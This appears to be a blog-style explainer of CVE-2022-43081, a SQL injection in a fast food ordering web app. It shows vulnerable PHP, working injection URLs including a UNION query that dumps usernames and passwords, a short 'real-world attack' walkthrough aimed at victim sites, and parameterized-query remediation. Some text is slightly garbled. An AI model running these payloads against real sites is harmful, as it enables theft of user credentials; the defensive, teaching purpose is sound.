CVE-2022-43081 - How a Simple Vulnerability in Fast Food Ordering System v1. Lets Hackers Break In (With Exploit Example)

When you’re hungry and order food online, you trust that the site is secure. But in 2022, a flaw — officially tracked as CVE-2022-43081 — was discovered in the Fast Food Ordering System v1.. This flaw makes it possible for attackers to run their own database commands and grab sensitive information. Let’s break this down in plain English, show you a code example, and explain how it works.

Vulnerability Type: SQL Injection

- Vulnerable File: /fastfood/purchase.php
- What Happens: An attacker can insert or "inject" SQL code into parts of the website, tricking it into giving up data, like usernames, passwords, or, worse, changing the site completely.

Where’s the Problem?

The vulnerable code is found in purchase.php. Here, the developer did not properly check or clean user input before adding it to the database query.

Imagine this (simplified PHP code)

<?php
include('db.php');
$id = $_GET['id'];
$sql = "SELECT * FROM orders WHERE id='$id'";
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);
echo "Order: " . $row['order_name'];
?>

If an attacker visits

http://example.com/fastfood/purchase.php?id=1

That's normal. But what if they try

http://example.com/fastfood/purchase.php?id=1' OR '1'='1

The query becomes

SELECT * FROM orders WHERE id='1' OR '1'='1'

Now, instead of just order 1, the database returns ALL orders because '1'='1' is always true.

Extracting User Data

Let’s suppose the database has a table of users too. With a UNION SQL injection, an attacker could do:

http://example.com/fastfood/purchase.php?id=1' UNION SELECT 1,username,password FROM users--

*(Note: Exact attack string may vary with database structure.)*

Here’s a step-by-step real-world attack

Step 1: Find a vulnerable site running this software.

Step 2: Visit the vulnerable URL with a payload

http://victim-site.com/fastfood/purchase.php?id=1'; UNION SELECT 1,user(),database()-- -

The database name (database())

Step 3: If the page displays the injected results, the site is vulnerable.

Why is This Serious?

- Data Theft: Attackers can read the whole database. Usernames, emails, order details, and maybe even passwords can be stolen.

Developers: Always use parameterized queries!

Bad:

$sql = "SELECT * FROM orders WHERE id='$id'";

Good

$stmt = $conn->prepare("SELECT * FROM orders WHERE id=?");
$stmt->bind_param("i", $id);
$stmt->execute();

References

- NVD Entry - CVE-2022-43081
- Github PoC by @linlinlzx
- OWASP SQL Injection Page

Final Thoughts

Even simple mistakes, like forgetting to check user input, can open the door to dangerous attacks. CVE-2022-43081 is a classic example. If you run Fast Food Ordering System v1., update or patch it fast!

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/02/2022 00:36:00 UTC